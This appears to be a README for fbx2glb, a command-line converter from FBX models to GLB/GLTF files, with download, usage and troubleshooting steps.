π fbx2glb - Easily Convert FBX to GLB/GLTF
π Getting Started
Welcome to fbx2glb! This application helps you convert FBX models to GLB/GLTF formats effortlessly. You can integrate these formats seamlessly into your Three.js and WebGL projects. Letβs get you started.
π₯ Download fbx2glb

π» System Requirements
Before downloading, ensure your system meets these requirements:
- Operating System: Windows, macOS, or Linux
- RAM: Minimum 4GB
- Disk Space: At least 100MB available
π Features
- Fast and efficient conversion from FBX to GLB/GLTF formats.
- Supports various types of FBX files, including animations.
- Easily integrates with Three.js and WebGL projects.
- Optimized to work with Draco compression for smaller file sizes.
- User-friendly command-line interface ensures a smooth experience.
π Download & Install
To download fbx2glb, visit this page: Download Page.
Once there, follow these steps:
- Locate the latest release at the top of the page.
- Click on the appropriate file for your operating system to start the download.
- For Windows, download the
.exe file.
- For macOS, download the
.dmg file.
- For Linux, download the
.tar.gz file.
- After the download completes, follow the installation instructions for your platform.
π Usage Instructions
To convert an FBX file to GLB or GLTF format using fbx2glb, you need to open your command-line interface. Follow these steps:
- Open Command Line Interface:
- Windows: Search for βCommand Promptβ or βPowerShellβ.
- macOS: Use βTerminalβ.
- Linux: Use your preferred terminal application.
- Navigate to the Application Directory:
Change your directory to where fbx2glb is installed. Use the
cd command followed by the path to the fbx2glb folder. For example:
- Run the Application:
Use the following command to convert your file:
fbx2glb input.fbx output.glb
Replace input.fbx with the path to your FBX file and output.glb with your desired output file name.
- Check Your Output:
After the conversion ends, you can find your GLB file in the specified output location.
π Examples
Here are a few examples of commands you might use:
- Basic Conversion:
fbx2glb model.fbx model.glb
- Including Animation:
For FBX files with animations, the command remains the same, but make sure your input file contains the necessary animation data.
π§ Troubleshooting
If you encounter issues while using fbx2glb, consider the following tips:
-
Verify File Format:
Ensure your input file is an FBX format compatible with our tool.
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Check Command Syntax:
Double-check your command for any typos or incorrect paths.
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Look at Output Messages:
The command line will provide helpful messages if something goes wrong.
π Support
If you need help or have questions, please open an issue on our GitHub page.
π Thanks for Using fbx2glb
Your project success starts with the right tools. We hope you find fbx2glb useful for your needs. Happy converting!